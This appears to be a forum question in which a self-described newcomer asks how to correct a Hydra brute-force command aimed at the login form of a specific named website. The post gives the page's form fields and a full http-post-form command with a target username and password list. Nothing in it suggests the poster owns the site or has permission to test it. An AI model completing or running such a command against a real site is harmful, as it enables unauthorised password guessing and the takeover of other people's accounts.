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Help using Hydra brute force


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Im using hydra and I don't know what I should do in this case.

My trial is this website: www.projecthabbo.x10.bz/index.php

If you see the view-source of the page, we can see this:

<form method="post" action="logar.php">
  | <fieldset id="painel01"><legend>Entrar en Siaro Project</legend>
  | <input type="text" id="husuario" name="husuario" size="30" placeholder="Usuario"/>
  | <input type="password" id="hsenha" name="hsenha" size="30" placeholder="Contraseña">
  | <input type="submit" value="Entrar">

This is my command:
hydra -l coins -P PASSS.txt -vV -s 80 -f www.projecthabbo.x10.bz http-post-form "/index.php:husuario=^USER^&hsenha=^PASS^&Login=button:Entrar"

My question is, after "hsenha=^PASS^&" what should I put? I'm asking because the button for login at the page, doesn't have a "name" and basically I don't know how to submit the button at the hydra. I only want to know how to put correctly the command because I'm new using this and I just looking for a simple answer that includes how I can use the command correctly on that website. (www.projecthabbo.x10.bz/index.php)

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